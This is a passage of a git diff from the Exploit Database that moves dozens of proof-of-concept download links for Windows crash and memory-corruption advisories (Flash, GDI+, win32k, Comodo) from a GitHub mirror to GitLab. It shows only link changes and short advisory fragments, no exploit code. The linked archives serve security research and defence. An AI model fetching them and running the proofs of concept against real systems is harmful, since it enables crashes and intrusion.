+https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39601.zip \ No newline at end of file diff --git a/exploits/windows/dos/39602.txt b/exploits/windows/dos/39602.txt index 9d4dd3d1d..330a178f3 100644 --- a/exploits/windows/dos/39602.txt +++ b/exploits/windows/dos/39602.txt @@ -37,4 +37,4 @@ This is trying to initialize the probabilities array, but overflowing the heap b Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39602.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39602.zip \ No newline at end of file diff --git a/exploits/windows/dos/39603.txt b/exploits/windows/dos/39603.txt index 5390e1d12..5a3a308ed 100644 --- a/exploits/windows/dos/39603.txt +++ b/exploits/windows/dos/39603.txt @@ -35,4 +35,4 @@ script!CreateInstance+0x178ac: Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39603.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39603.zip \ No newline at end of file diff --git a/exploits/windows/dos/39605.txt b/exploits/windows/dos/39605.txt index 37e7c51a0..df2cdcb70 100644 --- a/exploits/windows/dos/39605.txt +++ b/exploits/windows/dos/39605.txt @@ -74,4 +74,4 @@ I think the same bug exists in rtcSpaceBstr, rtcSpaceVar, rtcUpperCaseBstr, rtcU Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39605.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39605.zip \ No newline at end of file diff --git a/exploits/windows/dos/39606.txt b/exploits/windows/dos/39606.txt index 2aff9845c..e57b0c7d2 100644 --- a/exploits/windows/dos/39606.txt +++ b/exploits/windows/dos/39606.txt @@ -47,4 +47,4 @@ Please note that many of the CAV modules used by Comodo do not use dynamic base, Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39606.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39606.zip \ No newline at end of file diff --git a/exploits/windows/dos/39608.txt b/exploits/windows/dos/39608.txt index b24f7adfd..6787d1a67 100644 --- a/exploits/windows/dos/39608.txt +++ b/exploits/windows/dos/39608.txt @@ -4,4 +4,4 @@ The attached fuzz case causes a crash in shape rendering. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39608.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39608.zip \ No newline at end of file diff --git a/exploits/windows/dos/39609.txt b/exploits/windows/dos/39609.txt index 5cfc0c130..57ed18d1e 100644 --- a/exploits/windows/dos/39609.txt +++ b/exploits/windows/dos/39609.txt @@ -4,4 +4,4 @@ There is a heap overflow in the Zlib codecs used when playing flv files in flash Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39609.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39609.zip \ No newline at end of file diff --git a/exploits/windows/dos/39610.txt b/exploits/windows/dos/39610.txt index 1a2170201..872715de5 100644 --- a/exploits/windows/dos/39610.txt +++ b/exploits/windows/dos/39610.txt @@ -6,4 +6,4 @@ A sample swf is attached. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39610.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39610.zip \ No newline at end of file diff --git a/exploits/windows/dos/39611.txt b/exploits/windows/dos/39611.txt index 8df275766..2a7968b62 100644 --- a/exploits/windows/dos/39611.txt +++ b/exploits/windows/dos/39611.txt @@ -14,4 +14,4 @@ A PoC is attached, it is a bit finicky but crashes in the most recent Chrome Fla Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39611.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39611.zip \ No newline at end of file diff --git a/exploits/windows/dos/39612.txt b/exploits/windows/dos/39612.txt index d62eaba30..e582a4570 100644 --- a/exploits/windows/dos/39612.txt +++ b/exploits/windows/dos/39612.txt @@ -13,4 +13,4 @@ A PoC is attached, it is a bit finicky but crashes in the most recent Chrome Fla Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39612.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39612.zip \ No newline at end of file diff --git a/exploits/windows/dos/39613.txt b/exploits/windows/dos/39613.txt index fb5cc2bec..6bee1a6c5 100644 --- a/exploits/windows/dos/39613.txt +++ b/exploits/windows/dos/39613.txt @@ -12,4 +12,4 @@ A PoC is attached, it is a bit finicky and depends a lot on the specific Flash v Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39613.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39613.zip \ No newline at end of file diff --git a/exploits/windows/dos/39647.txt b/exploits/windows/dos/39647.txt index 78624aab4..f5e7163f8 100644 --- a/exploits/windows/dos/39647.txt +++ b/exploits/windows/dos/39647.txt @@ -4,4 +4,4 @@ The attached Proof-of-Concept crashes Windows 7 with special pool enabled on win Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39647.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39647.zip \ No newline at end of file diff --git a/exploits/windows/dos/39648.txt b/exploits/windows/dos/39648.txt index c4423ef89..4e8751715 100644 --- a/exploits/windows/dos/39648.txt +++ b/exploits/windows/dos/39648.txt @@ -4,4 +4,4 @@ The attached Proof-of-Concept crashes Windows 7 with special pool enabled on win Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39648.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39648.zip \ No newline at end of file diff --git a/exploits/windows/dos/39743.txt b/exploits/windows/dos/39743.txt index 6c7805739..c9b461d21 100644 --- a/exploits/windows/dos/39743.txt +++ b/exploits/windows/dos/39743.txt @@ -79,4 +79,4 @@ When the "Smooth edges of screen fonts" option is disabled, the bugcheck also oc Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39743.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39743.zip \ No newline at end of file diff --git a/exploits/windows/dos/39770.txt b/exploits/windows/dos/39770.txt index 476a51627..a9a676fad 100644 --- a/exploits/windows/dos/39770.txt +++ b/exploits/windows/dos/39770.txt @@ -40,4 +40,4 @@ So it looks like that calculation is used as an index into @rsi, which is obviou Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39770.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39770.zip \ No newline at end of file diff --git a/exploits/windows/dos/39778.txt b/exploits/windows/dos/39778.txt index 9995ea7af..82eb34a4e 100644 --- a/exploits/windows/dos/39778.txt +++ b/exploits/windows/dos/39778.txt @@ -4,4 +4,4 @@ There is a use-after-free that appears to be related to rendering the display ba Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39778.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39778.zip \ No newline at end of file diff --git a/exploits/windows/dos/39779.txt b/exploits/windows/dos/39779.txt index 0918d39db..52b267396 100644 --- a/exploits/windows/dos/39779.txt +++ b/exploits/windows/dos/39779.txt @@ -4,4 +4,4 @@ There is a use-after-free in MovieClip.duplicateMovieClip.If an action associate Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39779.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39779.zip \ No newline at end of file diff --git a/exploits/windows/dos/39819.txt b/exploits/windows/dos/39819.txt index 5ce34c656..545af5494 100644 --- a/exploits/windows/dos/39819.txt +++ b/exploits/windows/dos/39819.txt @@ -6,7 +6,7 @@ Found : 11.05.2016 More: http://HauntIT.blogspot.com Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39819.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39819.zip ---------------------------------------------------------------------- Microsoft (R) Windows Debugger Version 6.11.0001.404 X86 diff --git a/exploits/windows/dos/39832.txt b/exploits/windows/dos/39832.txt index 96424c9fb..3ca7b8c1c 100644 --- a/exploits/windows/dos/39832.txt +++ b/exploits/windows/dos/39832.txt @@ -114,4 +114,4 @@ Another note is that the gdi32.dll SETICMPROFILEA and SETICMPROFILEW record hand Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39832.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39832.zip \ No newline at end of file diff --git a/exploits/windows/dos/39833.txt b/exploits/windows/dos/39833.txt index d90285351..ed6a92eb1 100644 --- a/exploits/windows/dos/39833.txt +++ b/exploits/windows/dos/39833.txt @@ -122,4 +122,4 @@ WARNING: Stack unwind information not available. Following frames may be wrong. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39833.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39833.zip \ No newline at end of file diff --git a/exploits/windows/dos/39959.txt b/exploits/windows/dos/39959.txt index d981b1013..8e479933e 100644 --- a/exploits/windows/dos/39959.txt +++ b/exploits/windows/dos/39959.txt @@ -4,4 +4,4 @@ The attached PoC triggers a blue screen on Windows 7 with special pool enabled o Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39959.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39959.zip \ No newline at end of file diff --git a/exploits/windows/dos/39960.txt b/exploits/windows/dos/39960.txt index 013ed5cf2..b1864d118 100644 --- a/exploits/windows/dos/39960.txt +++ b/exploits/windows/dos/39960.txt @@ -4,4 +4,4 @@ The attached PoC crashes 32-bit Windows 7 with special pool enabled on win32k.sy Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39960.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39960.zip \ No newline at end of file diff --git a/exploits/windows/dos/39990.txt b/exploits/windows/dos/39990.txt index 183c9a1e2..dcdfd0dea 100644 --- a/exploits/windows/dos/39990.txt +++ b/exploits/windows/dos/39990.txt @@ -52,4 +52,4 @@ In order to demonstrate that the bug is real and affects Internet Explorer (amon Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39990.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39990.zip \ No newline at end of file diff --git a/exploits/windows/dos/39991.txt b/exploits/windows/dos/39991.txt index e985517e0..21cacfd94 100644 --- a/exploits/windows/dos/39991.txt +++ b/exploits/windows/dos/39991.txt @@ -149,4 +149,4 @@ References: Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39991.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39991.zip \ No newline at end of file diff --git a/exploits/windows/dos/40255.txt b/exploits/windows/dos/40255.txt index 69db8a440..066a9065e 100644 --- a/exploits/windows/dos/40255.txt +++ b/exploits/windows/dos/40255.txt @@ -99,4 +99,4 @@ The above analysis was performed using the gdiplus.dll file found in C:\Windows\ Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40255.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40255.zip \ No newline at end of file diff --git a/exploits/windows/dos/40256.txt b/exploits/windows/dos/40256.txt index 2dba6ec91..9a8eb5bba 100644 --- a/exploits/windows/dos/40256.txt +++ b/exploits/windows/dos/40256.txt @@ -81,4 +81,4 @@ The above analysis was performed using the gdiplus.dll file found in C:\Windows\ Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40256.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40256.zip \ No newline at end of file diff --git a/exploits/windows/dos/40257.txt b/exploits/windows/dos/40257.txt index add314e0b..f2d239371 100644 --- a/exploits/windows/dos/40257.txt +++ b/exploits/windows/dos/40257.txt @@ -119,4 +119,4 @@ The above analysis was performed using the gdiplus.dll file found in C:\Windows\ Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40257.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40257.zip \ No newline at end of file diff --git a/exploits/windows/dos/40398.txt b/exploits/windows/dos/40398.txt index db1ce109f..e875ab372 100644 --- a/exploits/windows/dos/40398.txt +++ b/exploits/windows/dos/40398.txt @@ -56,4 +56,4 @@ Attached is a Proof of Concept Python script, which connects to the COM1 serial Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40398.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40398.zip \ No newline at end of file diff --git a/exploits/windows/dos/40399.txt b/exploits/windows/dos/40399.txt index efcf9efbe..946bea1de 100644 --- a/exploits/windows/dos/40399.txt +++ b/exploits/windows/dos/40399.txt @@ -62,4 +62,4 @@ It was empirically confirmed that some of the heap corruptions can be leveraged Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40399.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40399.zip \ No newline at end of file diff --git a/exploits/windows/dos/40406.txt b/exploits/windows/dos/40406.txt index 3b949121b..2fd37c282 100644 --- a/exploits/windows/dos/40406.txt +++ b/exploits/windows/dos/40406.txt @@ -83,4 +83,4 @@ Given the different crashing contexts related to timing when breakpoints are set Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40406.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40406.zip \ No newline at end of file diff --git a/exploits/windows/dos/40411.txt b/exploits/windows/dos/40411.txt index 222934ca2..bc8077eea 100644 --- a/exploits/windows/dos/40411.txt +++ b/exploits/windows/dos/40411.txt @@ -4,7 +4,7 @@ Date: Aug 31st, 2016 Complete Proof of Concept: https://github.com/tintinweb/pub/tree/master/pocs/cve-2016-5725 -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40411.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40411.zip Tag: jsch recursive sftp get client-side windows path traversal diff --git a/exploits/windows/dos/4044.txt b/exploits/windows/dos/4044.txt index 3e0583835..9c8782cfd 100644 --- a/exploits/windows/dos/4044.txt +++ b/exploits/windows/dos/4044.txt @@ -5,6 +5,6 @@ #################################### highsecu.ico - Microsoft GDI+ Integer division by zero flaw handling .ICO files -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/4044.zip (06072007-CVE-2007-2237.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/4044.zip (06072007-CVE-2007-2237.zip) # milw0rm.com [2007-06-07] \ No newline at end of file diff --git a/exploits/windows/dos/40508.txt b/exploits/windows/dos/40508.txt index 8bc753891..828ca35d8 100644 --- a/exploits/windows/dos/40508.txt +++ b/exploits/windows/dos/40508.txt @@ -55,6 +55,6 @@ The specific flaw exists within the parsing process of an invalid JPG in WRF fil ========== https://cosig.gouv.qc.ca/wp-content/uploads/2016/09/COSIG-2016-33.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40508.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40508.zip ####################################################################################### \ No newline at end of file diff --git a/exploits/windows/dos/40509.txt b/exploits/windows/dos/40509.txt index c126a904a..746d595f1 100644 --- a/exploits/windows/dos/40509.txt +++ b/exploits/windows/dos/40509.txt @@ -55,6 +55,6 @@ The flaw exists within the parsing process of an invalid ARF file. An attacker c ========== https://cosig.gouv.qc.ca/wp-content/uploads/2016/09/COSIG-2016-34.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40509.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40509.zip ####################################################################################### \ No newline at end of file diff --git a/exploits/windows/dos/40598.txt b/exploits/windows/dos/40598.txt index 3318c1784..1b78a375c 100644 --- a/exploits/windows/dos/40598.txt +++ b/exploits/windows/dos/40598.txt @@ -96,4 +96,4 @@ Attached is an archive with two proof of concept font files. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40598.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40598.zip \ No newline at end of file diff --git a/exploits/windows/dos/40599.txt b/exploits/windows/dos/40599.txt index 1e834c9a2..3df7744c5 100644 --- a/exploits/windows/dos/40599.txt +++ b/exploits/windows/dos/40599.txt @@ -160,4 +160,4 @@ Attached is an archive with three proof of concept font files. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40599.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40599.zip \ No newline at end of file diff --git a/exploits/windows/dos/40600.txt b/exploits/windows/dos/40600.txt index 94e94af6c..a66212dd1 100644 --- a/exploits/windows/dos/40600.txt +++ b/exploits/windows/dos/40600.txt @@ -47,4 +47,4 @@ Attached are three proof of concept hive files. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40600.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40600.zip \ No newline at end of file diff --git a/exploits/windows/dos/40601.txt b/exploits/windows/dos/40601.txt index 5c48fdf5f..928552020 100644 --- a/exploits/windows/dos/40601.txt +++ b/exploits/windows/dos/40601.txt @@ -52,4 +52,4 @@ The issue reproduces on Windows 7 and 8.1. In order to reproduce the problem wit Attached is a proof of concept hive file. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40601.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40601.zip \ No newline at end of file diff --git a/exploits/windows/dos/40617.txt b/exploits/windows/dos/40617.txt index 56e6d0f39..b36b459c0 100644 --- a/exploits/windows/dos/40617.txt +++ b/exploits/windows/dos/40617.txt @@ -197,4 +197,4 @@ qcpfformat+0x13dc: POC: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40617.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40617.zip \ No newline at end of file diff --git a/exploits/windows/dos/40656.txt b/exploits/windows/dos/40656.txt index 1f0ddf3ca..f4c7e6366 100644 --- a/exploits/windows/dos/40656.txt +++ b/exploits/windows/dos/40656.txt @@ -56,4 +56,4 @@ However, this doesn't change the fact that with the provided PoC, the pool alloc Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40656.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40656.zip \ No newline at end of file diff --git a/exploits/windows/dos/40657.txt b/exploits/windows/dos/40657.txt index 6b2d30482..ee3260fcf 100644 --- a/exploits/windows/dos/40657.txt +++ b/exploits/windows/dos/40657.txt @@ -44,4 +44,4 @@ all the right values for the machine it's running on. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40657.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40657.zip \ No newline at end of file diff --git a/exploits/windows/dos/40658.txt b/exploits/windows/dos/40658.txt index eae3c1452..ee8e213cd 100644 --- a/exploits/windows/dos/40658.txt +++ b/exploits/windows/dos/40658.txt @@ -54,4 +54,4 @@ all the right values for the machine it's running on. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40658.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40658.zip \ No newline at end of file diff --git a/exploits/windows/dos/40659.txt b/exploits/windows/dos/40659.txt index 68ab359c8..b50aeca28 100644 --- a/exploits/windows/dos/40659.txt +++ b/exploits/windows/dos/40659.txt @@ -27,4 +27,4 @@ For completeness, it looks like many of the other escape handlers in the same fu Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40659.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40659.zip \ No newline at end of file diff --git a/exploits/windows/dos/40661.txt b/exploits/windows/dos/40661.txt index 87e514d4d..9593c21f6 100644 --- a/exploits/windows/dos/40661.txt +++ b/exploits/windows/dos/40661.txt @@ -45,4 +45,4 @@ To reproduce, compile as a x64 executable and run (requires WDK for D3DKMTEscape Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40661.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40661.zip \ No newline at end of file diff --git a/exploits/windows/dos/40662.txt b/exploits/windows/dos/40662.txt index fc036ffb7..0660786da 100644 --- a/exploits/windows/dos/40662.txt +++ b/exploits/windows/dos/40662.txt @@ -37,4 +37,4 @@ all the right values for the machine it's running on. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40662.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40662.zip \ No newline at end of file diff --git a/exploits/windows/dos/40663.txt b/exploits/windows/dos/40663.txt index ac7f38e80..76b03f973 100644 --- a/exploits/windows/dos/40663.txt +++ b/exploits/windows/dos/40663.txt @@ -39,4 +39,4 @@ To reproduce, compile PoC as a x64 executable and run (requires WDK for D3DKMTEs Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40663.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40663.zip \ No newline at end of file diff --git a/exploits/windows/dos/40664.txt b/exploits/windows/dos/40664.txt index 0d05af125..9c7e9c850 100644 --- a/exploits/windows/dos/40664.txt +++ b/exploits/windows/dos/40664.txt @@ -44,4 +44,4 @@ To reproduce, compile as an x64 executable an run (requires WDK for D3DKMTEscape Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40664.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40664.zip \ No newline at end of file diff --git a/exploits/windows/dos/40665.txt b/exploits/windows/dos/40665.txt index 14f933a8c..2316e5113 100644 --- a/exploits/windows/dos/40665.txt +++ b/exploits/windows/dos/40665.txt @@ -57,4 +57,4 @@ fffff801`02461188 8941fc mov dword ptr [rcx-4],eax ds:ffffc001`cd33 Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40665.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40665.zip \ No newline at end of file diff --git a/exploits/windows/dos/40666.txt b/exploits/windows/dos/40666.txt index c91755e5f..ef864bfd8 100644 --- a/exploits/windows/dos/40666.txt +++ b/exploits/windows/dos/40666.txt @@ -52,4 +52,4 @@ Arg4: 0000000000000000, Reserved Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40666.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40666.zip \ No newline at end of file diff --git a/exploits/windows/dos/40667.txt b/exploits/windows/dos/40667.txt index f927c0ecf..b323856e1 100644 --- a/exploits/windows/dos/40667.txt +++ b/exploits/windows/dos/40667.txt @@ -28,4 +28,4 @@ ffffd000`23f95270 00000000`00000000 : 00000000`00000000 00000000`00000000 000000 Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40667.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40667.zip \ No newline at end of file diff --git a/exploits/windows/dos/40668.txt b/exploits/windows/dos/40668.txt index 13cf48823..a7d245926 100644 --- a/exploits/windows/dos/40668.txt +++ b/exploits/windows/dos/40668.txt @@ -51,4 +51,4 @@ ffffd000`263bce88 00000000`00000000 : 00000c48`01380702 00010000`000166c2 000000 Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40668.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40668.zip \ No newline at end of file diff --git a/exploits/windows/dos/40744.txt b/exploits/windows/dos/40744.txt index 7d9097cf0..faae54069 100644 --- a/exploits/windows/dos/40744.txt +++ b/exploits/windows/dos/40744.txt @@ -77,7 +77,7 @@ Proof of concept A proof of concept is available at the following URL: https://github.com/lgandx/PoC/tree/master/LSASS -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40744.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40744.zip This proof of concept is fully automated and includes non-vulnerable detection. diff --git a/exploits/windows/dos/40745.c b/exploits/windows/dos/40745.c index 842db87a0..77f71ccdc 100644 --- a/exploits/windows/dos/40745.c +++ b/exploits/windows/dos/40745.c @@ -4,7 +4,7 @@ Source: https://github.com/tinysec/public/tree/master/CVE-2016-7255 Full Proof of Concept: https://github.com/tinysec/public/tree/master/CVE-2016-7255 -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40745.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40745.zip ******************************************************************** Created: 2016-11-09 14:23:09 diff --git a/exploits/windows/dos/40766.txt b/exploits/windows/dos/40766.txt index 5a78dd254..5663cd965 100644 --- a/exploits/windows/dos/40766.txt +++ b/exploits/windows/dos/40766.txt @@ -49,4 +49,4 @@ The issue reproduces on Windows 7. It is easiest to reproduce with Special Pools Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40766.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40766.zip \ No newline at end of file diff --git a/exploits/windows/dos/41025.txt b/exploits/windows/dos/41025.txt index fa17b2774..948994dd4 100644 --- a/exploits/windows/dos/41025.txt +++ b/exploits/windows/dos/41025.txt @@ -22,4 +22,4 @@ is a potential for remote code execution via a malicious media file. POC: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41025.mov \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41025.mov \ No newline at end of file diff --git a/exploits/windows/dos/4121.txt b/exploits/windows/dos/4121.txt index 0a3dd0f9b..1b0862ee8 100644 --- a/exploits/windows/dos/4121.txt +++ b/exploits/windows/dos/4121.txt @@ -4,6 +4,6 @@ http://www.ph4nt0m.org Tested on: Full Patched Excel 2003 Sp2, CN -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/4121.zip (06272007-2670.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/4121.zip (06272007-2670.zip) # milw0rm.com [2007-06-27] \ No newline at end of file diff --git a/exploits/windows/dos/41222.py b/exploits/windows/dos/41222.py index 948c0a6ce..0203e0a28 100755 --- a/exploits/windows/dos/41222.py +++ b/exploits/windows/dos/41222.py @@ -1,5 +1,5 @@ # Full Proof of Concept: -# https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41222.zip +# https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41222.zip import sys, struct, SocketServer from odict import OrderedDict diff --git a/exploits/windows/dos/41363.txt b/exploits/windows/dos/41363.txt index 57e6d1304..219d91457 100644 --- a/exploits/windows/dos/41363.txt +++ b/exploits/windows/dos/41363.txt @@ -28,4 +28,4 @@ It is strongly advised to perform a careful audit of all EMF record handlers res Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41363.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41363.zip \ No newline at end of file diff --git a/exploits/windows/dos/41364.txt b/exploits/windows/dos/41364.txt index 48acdac1e..cddd88985 100644 --- a/exploits/windows/dos/41364.txt +++ b/exploits/windows/dos/41364.txt @@ -38,4 +38,4 @@ fffff801`0e34a50b 418b02 mov eax,dword ptr [r10] ds:ffffd000`266230 Proof of Concept: 